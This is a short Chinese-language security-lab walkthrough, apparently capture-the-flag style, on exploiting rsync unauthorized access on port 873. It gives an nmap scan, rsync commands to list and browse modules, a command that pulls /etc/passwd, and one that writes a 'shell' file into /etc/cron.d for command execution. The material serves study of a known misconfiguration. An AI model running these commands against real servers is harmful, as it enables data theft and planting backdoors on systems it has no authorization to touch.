【初级】rsync-common 未授权访问

漏洞描述:rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。

rsync未授权访问带来的危害主要有两个:一是造成了严重的信息泄露;二是上传脚本后门文件,远程命令执行。

影响版本:全版本

参考资料:

漏洞复现

  • 使用nmap扫描目标系统是否开放rsync服务
  • nmap -p 873 ip
图片[1]-【初级】rsync-common 未授权访问-NGC660 安全实验室
  • 使用以下两条命令,列出目标服务器的同步目录
  • rsync ip::
  • rsync rsync://ip:873
图片[2]-【初级】rsync-common 未授权访问-NGC660 安全实验室
  • 在路径后面添加目录名即可查看目录中的文件
  • rsync ip::src
图片[3]-【初级】rsync-common 未授权访问-NGC660 安全实验室
  • 获取flag
图片[4]-【初级】rsync-common 未授权访问-NGC660 安全实验室

其它操作

任意下载
rsync -av rsync://your-ip:873/src/etc/passwd ./

写入任意文件
rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell
© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享